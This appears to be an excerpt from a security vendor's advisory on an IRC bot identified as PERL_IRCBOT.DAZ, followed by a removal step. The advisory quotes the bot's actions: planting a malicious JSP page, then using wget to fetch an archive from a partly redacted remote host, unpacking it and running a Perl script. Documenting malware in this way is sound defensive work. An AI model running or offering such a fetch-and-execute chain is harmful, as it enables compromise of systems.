It performs the following:
- Create a malicious JSP page on vulnerable systems and execute the following commands
- # wget http://{BLOCKED}tick.{BLOCKED}-remote.com/kisses.tar.gz
- # tar xzvf kisses.tar.gz
- # perl linda.pl
SOLUTION
Step 1
Scan your computer with your Trend Micro product to delete files detected as PERL_IRCBOT.DAZ. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files.
